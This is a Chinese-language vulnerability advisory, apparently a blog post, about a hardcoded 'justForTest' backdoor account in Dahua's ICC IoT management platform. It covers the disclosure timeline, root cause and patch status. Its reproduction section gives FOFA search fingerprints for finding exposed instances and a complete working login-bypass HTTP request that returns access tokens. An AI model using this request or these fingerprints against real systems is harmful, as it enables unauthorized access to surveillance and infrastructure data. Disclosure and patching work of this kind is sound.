一、漏洞概述
浙江大华技术股份有限公司的智能物联综合管理平台(ICC) 被曝存在严重身份验证漏洞。攻击者可通过内置账户 justForTest 配合任意密码直接登录系统,导致未授权访问及敏感信息泄露。该漏洞因身份校验逻辑缺陷形成“后门”,威胁等级为高危。
二、漏洞复现与验证
资产测绘:使用FOFA寻找智能物联综合管理平台指纹
icon_hash="-1935899595"
body="*客户端会小于800*"
漏洞复现:
平台基本页面:
使用Burp抓包修改数据
POC:
POST /evo-apigw/evo-oauth/oauth/token HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Content-Length: 109
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
username=justForTest&password=1&grant_type=password&client_id=web_client&client_secret=web_client&public_key=
返回包出现各种token证明漏洞存在
直接使用justForTest账户和任意密码登录
三、漏洞发现及扩散
首次公开披露
2023年12月17日:漏洞在技术社区(CN-SEC)首次曝光,披露ICC平台存在justForTest账户可配合任意密码登录的身份验证绕过漏洞,并提供了复现POC及Fofa测绘指纹。
2023年12月27日:漏洞细节进一步扩散至优快云等平台,新增Nuclei自动化检测脚本,推动漏洞进入规模化验证阶段。
2024年6月:漏洞被集成至“大华综合漏洞利用工具”,支持批量检测目标并自动化登录,显著降低攻击门槛。
黑产利用:暗网论坛出现利用该漏洞窃取的园区安防数据、工业监控录像交易记录,部分案例涉及关键基础设施。
漏洞根源推测:
根据技术分析,justForTest账户疑似开发阶段遗留的测试后门账户,未在生产环境清除且缺乏密码校验逻辑,属于典型“硬编码凭证”类漏洞。
四、补丁修复情况
官方修复进展
2025年1月15日:大华发布ICC平台多漏洞修复补丁(含CNVD-2025-00420),覆盖justForTest漏洞及关联高危漏洞(如GetClassValue命令执行漏洞)。
补丁获取途径:厂商官网提供安全版本升级(https://www.dahuatech.com/),但未单独发布该漏洞的专用补丁公告。
扫一扫
3794
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
